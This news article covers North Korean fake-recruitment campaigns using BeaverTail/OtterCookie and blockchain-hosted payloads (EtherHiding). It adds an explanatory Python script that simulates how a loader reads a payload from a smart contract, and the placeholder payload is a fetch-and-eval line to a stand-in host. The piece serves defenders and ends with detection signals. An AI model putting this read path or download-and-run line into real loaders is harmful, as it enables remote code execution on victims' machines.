North Korea: The Ultimate Cyber-Attack? Evasive Malware and Blockchain in the Crosshairs.
By Hamza Ahmed profile image Hamza Ahmed

According to Cisco Talos and Google, the North Korean groups Famous Chollima and UNC5342 are using evasive malware (the BeaverTail/OtterCookie pair) and a blockchain-hosted payload delivery technique known as EtherHiding.

Threat actors linked to North Korea are stepping up their cyber operations, using decentralised and evasive malware tools, according to new findings by Cisco Talos and Google Threat Intelligence Group.

The campaigns use elaborate fake recruitment processes as their initial lure, and aim to steal cryptocurrency, infiltrate networks and evade security controls.

The Evolution of Malware Techniques for Evasion

Cisco Talos researchers identified an ongoing campaign by North Korean group Famous Chollima, which used two complementary malware strains: BeaverTail and OtterCookie.

These programmes, traditionally used for credential theft and data exfiltration, have evolved to incorporate new functionality and closer integration with each other.

In a recent incident involving an organisation in Sri Lanka, attackers tricked a job seeker into installing malicious code disguised as a technical assessment.

Although the organisation itself was not a direct target, Cisco Talos analysts observed a keylogging and screenshot capture module linked to OtterCookie. This module covertly recorded keystrokes and captured desktop images, automatically transmitting them to a remote command-and-control server.

This observation underscores the continued evolution of North Korea-aligned threat groups and their focus on social engineering techniques to compromise unsuspecting targets.

Blockchain Used As Command Infrastructure

The Google Threat Intelligence Group (GTIG) identified an operation by the North Korea-linked actor UNC5342. The group used a technique known as EtherHiding.

The technique stores malicious JavaScript payloads inside a smart contract on a public blockchain. The first-stage loader on the victim's machine retrieves them with read-only calls to a public node, which turns the chain into a decentralised command-and-control (C2) channel.

Because contract state can be updated with a new transaction, attackers can swap the payload and change the malware's behaviour remotely without operating a traditional server. And because data written to a public blockchain cannot be removed, takedowns by law enforcement become much more difficult.
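To make the mechanics concrete, the following is an added example written for this page, not code from Google, Cisco or the threat actor. It shows the shape of the JSON-RPC `eth_call` request a loader sends to a public node to read contract state, and how the ABI-encoded `string` that comes back is decoded into the JavaScript the loader would hand to eval(). The contract address, function selector and payload are constructed placeholders (a real selector is the first four bytes of keccak256 over the function signature, which the Python standard library cannot compute, so a hypothetical one is passed in); the node's reply is simulated locally so the script runs offline.

```python
"""
Blockchain-as-C2 read path, illustrative code added for this page.

Not the actors' loader and not GTIG's tooling; every identifier below is a
constructed placeholder. The point is the protocol shape: a read-only
eth_call against a public RPC node returns an ABI-encoded string, and that
string is the next-stage script.
"""
import json

# Constructed placeholders (assumptions, not real indicators of compromise).
HYPOTHETICAL_CONTRACT = "0x" + "ab" * 20     # 20-byte contract address
HYPOTHETICAL_SELECTOR = "0x11223344"         # stand-in for keccak256(sig)[:4]
HYPOTHETICAL_PAYLOAD = 'fetch("https://example.invalid/stage2").then(r=>r.text()).then(eval)'


def build_eth_call(contract: str, selector: str, request_id: int = 1) -> dict:
    """JSON-RPC body a loader POSTs to a public node to read contract state.

    eth_call executes the function on the node only: nothing is signed, no gas
    is paid and nothing is written to the chain, so the read leaves no on-chain
    trace and works against any public RPC endpoint.
    """
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    }


def encode_abi_string(s: str) -> str:
    """ABI-encode a single `string` return value (the node's `result` field).

    Layout: 32-byte offset to the string head (0x20), 32-byte byte length,
    then the UTF-8 bytes right-padded with zeros to a 32-byte boundary.
    """
    raw = s.encode("utf-8")
    head = (32).to_bytes(32, "big") + len(raw).to_bytes(32, "big")
    pad = (-len(raw)) % 32
    return "0x" + (head + raw + b"\x00" * pad).hex()


def decode_abi_string(result_hex: str) -> str:
    """Decode the eth_call `result` of a function returning `string`.

    Offset and length are bounds-checked so a truncated or malformed reply
    raises ValueError instead of yielding garbage.
    """
    hex_body = result_hex[2:] if result_hex.startswith("0x") else result_hex
    data = bytes.fromhex(hex_body)
    if len(data) < 64:
        raise ValueError("response too short for an ABI-encoded string")
    offset = int.from_bytes(data[:32], "big")
    if offset + 32 > len(data):
        raise ValueError("string offset points outside the response")
    length = int.from_bytes(data[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(data):
        raise ValueError("declared string length exceeds the response")
    return data[start:start + length].decode("utf-8")


def simulate_c2_read(contract: str = HYPOTHETICAL_CONTRACT,
                     selector: str = HYPOTHETICAL_SELECTOR,
                     stored_payload: str = HYPOTHETICAL_PAYLOAD) -> tuple:
    """Round-trip: the loader's request and the script it recovers from the reply.

    Returns (request_dict, recovered_payload). The node reply is simulated;
    a real loader would POST `request` to a public RPC URL and read `result`.
    """
    request = build_eth_call(contract, selector)
    node_reply = {"jsonrpc": "2.0", "id": request["id"],
                  "result": encode_abi_string(stored_payload)}
    return request, decode_abi_string(node_reply["result"])


if __name__ == "__main__":
    req, payload = simulate_c2_read()
    print(json.dumps(req))
    print("recovered next-stage script:", payload)
```

Two defensive consequences follow from the shape of this exchange. Since the attacker can replace the stored string with one write transaction, the hash of any particular payload is a poor indicator; the stable signals are outbound JSON-RPC `eth_call` traffic to public RPC endpoints from hosts with no legitimate Web3 use, and browser or Node scripts that pass an RPC `result` field into eval() or Function().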

In addition, GTIG reported that UNC5342 applied EtherHiding within the long-running fake job interview campaign known as Contagious Interview, previously identified by Palo Alto Networks, demonstrating the persistence of threat actors aligned to North Korea.

Target: Crypto Sector Professionals

According to Google researchers, these cyber operations typically begin with fraudulent job advertisements targeting professionals in the cryptocurrency and cybersecurity sectors.

Victims are invited to participate in fake assessments, during which they are asked to download files containing malicious code.

The infection process often involves multiple malware families, including JadeSnow, BeaverTail and InvisibleFerret. Together, these tools allow attackers to gain access to systems, steal credentials and deploy ransomware. Their ultimate objectives range from espionage and financial theft to long-term network infiltration.

Cisco and Google have published Indicators of Compromise (IOCs) to help organisations detect and respond to ongoing cyber threats linked to North Korea. Researchers warn that the integration of blockchain and modular malware will likely continue to complicate global cybersecurity defence efforts.
